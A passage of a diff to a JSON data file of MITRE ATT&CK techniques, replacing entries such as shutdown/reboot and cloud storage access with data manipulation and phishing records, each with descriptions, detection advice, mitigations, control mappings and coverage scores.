-        "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)",
-        "url": "https://attack.mitre.org/techniques/T1529",
+        "tid": "T1565.001",
+        "name": "Data Manipulation: Stored Data Manipulation",
+        "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+        "url": "https://attack.mitre.org/techniques/T1565/001",
         "tactics": [
             "Impact"
         ],
-        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.",
+        "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: Process Creation",
-            "Sensor Health: Host Status"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.09285714285714286,
-        "adjusted_score": 0.09285714285714286,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.04285714285714285,
-            "detection_score": 0.09
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
-    },
-    {
-        "tid": "T1530",
-        "name": "Data from Cloud Storage Object",
-        "description": "Adversaries may access data objects from improperly secured cloud storage.\n\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)\n\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.",
-        "url": "https://attack.mitre.org/techniques/T1530",
-        "tactics": [
-            "Collection"
-        ],
-        "detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.",
-        "platforms": [
-            "IaaS"
-        ],
-        "data_sources": [
-            "Cloud Storage: Cloud Storage Access"
+            "File: File Creation",
+            "File: File Deletion",
+            "File: File Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1565",
         "subtechniques": [],
         "mitigations": [
-            {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
-            },
-            {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1029",
+                "name": "Remote Data Storage",
+                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
+                "url": "https://attack.mitre.org/mitigations/M1029"
             },
             {
                 "mid": "M1022",
                 "name": "Restrict File and Directory Permissions",
                 "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.6476190476190476,
-        "adjusted_score": 0.6476190476190476,
+        "cumulative_score": 0.3976190476190476,
+        "adjusted_score": 0.3976190476190476,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
             "3.11",
+            "3.12",
             "3.3",
-            "4.1",
-            "4.2",
-            "4.4",
-            "4.7",
-            "5.3",
-            "5.4",
             "6.1",
             "6.2",
-            "6.3",
-            "6.4",
-            "6.5",
             "6.8",
+            "8.9",
+            "11.1",
+            "11.2",
             "11.3",
-            "13.4",
-            "18.2",
-            "18.3",
-            "18.5"
+            "11.4",
+            "11.5",
+            "12.8"
         ],
         "nist_controls": [
             "AC-16",
             "AC-17",
             "AC-18",
             "AC-19",
-            "AC-2",
             "AC-20",
             "AC-3",
-            "AC-4",
-            "AC-5",
-            "AC-6",
-            "AC-7",
             "CA-7",
-            "CA-8",
             "CM-2",
-            "CM-5",
             "CM-6",
-            "CM-7",
             "CM-8",
-            "IA-2",
-            "IA-3",
-            "IA-4",
-            "IA-5",
-            "IA-6",
-            "IA-8",
-            "RA-5",
+            "CP-10",
+            "CP-6",
+            "CP-7",
+            "CP-9",
             "SC-28",
+            "SC-36",
             "SC-4",
             "SC-7",
-            "SI-10",
             "SI-12",
-            "SI-15",
+            "SI-16",
+            "SI-23",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.5476190476190477,
-            "mitigation_score": 0.9454545454545454,
-            "detection_score": 0.11
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
-    },
-    {
-        "tid": "T1531",
-        "name": "Account Access Removal",
-        "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n\nAdversaries may also subsequently log off and/or reboot boxes to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)",
-        "url": "https://attack.mitre.org/techniques/T1531",
-        "tactics": [
-            "Impact"
-        ],
-        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:\n\n* Event ID 4723 - An attempt was made to change an account's password\n* Event ID 4724 - An attempt was made to reset an account's password\n* Event ID 4726 - A user account was deleted\n* Event ID 4740 - A user account was locked out\n\nAlerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.",
-        "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Active Directory: Active Directory Object Modification",
-            "User Account: User Account Deletion",
-            "User Account: User Account Modification"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.1261904761904762,
-        "adjusted_score": 0.1261904761904762,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": false,
-        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.07619047619047618,
-            "detection_score": 0.16
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1534",
-        "name": "Internal Spearphishing",
-        "description": "Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)\n\nAdversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.\n\nThere have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)",
-        "url": "https://attack.mitre.org/techniques/T1534",
+        "tid": "T1565.002",
+        "name": "Data Manipulation: Transmitted Data Manipulation",
+        "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+        "url": "https://attack.mitre.org/techniques/T1565/002",
         "tactics": [
-            "Lateral Movement"
+            "Impact"
         ],
-        "detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing attacks.(Citation: Trend Micro When Phishing Starts from the Inside 2017)",
+        "detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
         "platforms": [
-            "Google Workspace",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
             "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "Network Traffic: Network Traffic Flow",
+            "Process: OS API Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1565",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.30000000000000004,
-        "adjusted_score": 0.30000000000000004,
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            }
+        ],
+        "cumulative_score": 0.18333333333333335,
+        "adjusted_score": 0.18333333333333335,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": false,
+        "cis_controls": [
+            "11.3",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
+            "CM-2",
+            "CM-6",
+            "CM-8",
+            "SC-4",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
         "network_coverage": true,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.30000000000000004,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1535",
-        "name": "Unused/Unsupported Cloud Regions",
-        "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)",
-        "url": "https://attack.mitre.org/techniques/T1535",
+        "tid": "T1565.003",
+        "name": "Data Manipulation: Runtime Data Manipulation",
+        "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
+        "url": "https://attack.mitre.org/techniques/T1565/003",
         "tactics": [
-            "Defense Evasion"
+            "Impact"
         ],
-        "detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)",
+        "detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.",
         "platforms": [
-            "IaaS"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Instance: Instance Creation"
+            "File: File Creation",
+            "File: File Deletion",
+            "File: File Metadata",
+            "File: File Modification",
+            "Process: OS API Execution"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1565",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 0.1761904761904762,
-        "adjusted_score": 0.1761904761904762,
+        "cumulative_score": 0.5595238095238095,
+        "adjusted_score": 0.5595238095238095,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
+        "has_sigma": true,
+        "has_es_siem": true,
         "has_splunk": true,
         "cis_controls": [
-            "4.1",
-            "18.3",
-            "18.5"
+            "3.12",
+            "3.3",
+            "4.4",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "11.3",
+            "11.4",
+            "12.2",
+            "12.8",
+            "16.8"
         ],
         "nist_controls": [
-            "SC-23"
-        ],
-        "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": false,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0761904761904762,
-            "mitigation_score": 0.07272727272727272,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-6",
+            "CM-7",
+            "CP-9",
+            "SC-28",
+            "SC-4",
+            "SC-46",
+            "SC-7",
+            "SI-16",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1537",
-        "name": "Transfer Data to Cloud Account",
-        "description": "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration detection.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ",
-        "url": "https://attack.mitre.org/techniques/T1537",
+        "tid": "T1566",
+        "name": "Phishing",
+        "description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.",
+        "url": "https://attack.mitre.org/techniques/T1566",
         "tactics": [
-            "Exfiltration"
+            "Initial Access"
         ],
-        "detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
+        "detection": "Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nURL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nBecause most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
         "platforms": [
-            "IaaS"
+            "Google Workspace",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Cloud Storage: Cloud Storage Creation",
-            "Cloud Storage: Cloud Storage Modification",
-            "Snapshot: Snapshot Creation",
-            "Snapshot: Snapshot Modification"
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1566.001",
+                "name": "Phishing: Spearphishing Attachment",
+                "url": "https://attack.mitre.org/techniques/T1566/001",
+                "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
+                "detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)",
+                "mitigations": [
+                    {
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1566.002",
+                "name": "Phishing: Spearphishing Link",
+                "url": "https://attack.mitre.org/techniques/T1566/002",
+                "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
+                "detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.",
+                "mitigations": [
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    },
+                    {
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1566.003",
+                "name": "Phishing: Spearphishing via Service",
+                "url": "https://attack.mitre.org/techniques/T1566/003",
+                "description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.",
+                "detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
+                "mitigations": [
+                    {
+                        "mid": "M1049",
+                        "name": "Antivirus/Antimalware",
+                        "description": "Use signatures or heuristics to detect malicious software.",
+                        "url": "https://attack.mitre.org/mitigations/M1049"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
+        ],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1049",
+                "name": "Antivirus/Antimalware",
+                "description": "Use signatures or heuristics to detect malicious software.",
+                "url": "https://attack.mitre.org/mitigations/M1049"
             },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1021",
+                "name": "Restrict Web-Based Content",
+                "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1021"
+            },
+            {
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
